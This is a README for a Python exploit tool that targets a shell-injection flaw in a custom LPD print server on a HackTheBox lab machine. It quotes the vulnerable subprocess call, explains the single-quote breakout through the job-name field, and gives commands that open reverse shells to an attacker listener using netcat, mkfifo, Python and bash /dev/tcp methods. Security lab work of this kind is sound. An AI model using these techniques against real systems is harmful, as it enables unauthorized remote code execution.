A precision Python exploit for a shell injection vulnerability in a custom LPD (Line Printer Daemon) server.
Tested on: HackTheBox — Paperwork
The vulnerable server passes the print job name unsanitized into a shell command:
subprocess.Popen(f"echo 'Archive: {job_name}' >> /tmp/archive.log", shell=True)This allows a single-quote breakout to achieve Remote Code Execution (RCE):
# Try all reverse shell payloads automatically
python3 poc.py TARGET --lhost YOUR_IP --lport 443
# Single specific payload
python3 poc.py TARGET --lhost YOUR_IP --lport 443 --payload mkfifo
# Test RCE without a listener (writes /tmp/rce_proof.txt on target)
python3 poc.py TARGET --proof| Flag | Method |
|---|---|
mkfifo |
mkfifo + netcat (most reliable) |
nc_e |
netcat with -e flag |
nc_c |
netcat with -c flag |
python3 |
Python3 socket + pty shell |
python |
Python2 socket + pty shell |
bash |
bash /dev/tcp redirect |
- Connects to target on port 1515 (default)
- Sends a print job to queue
archive_intake - Injects payload into the
J(job name) field of the LPD control file - Server executes injected command via
subprocess.Popen(..., shell=True)
pip install nothing # pure Python, no dependencies
python3 poc.py --helpFor authorized testing only. Built for HackTheBox lab environments.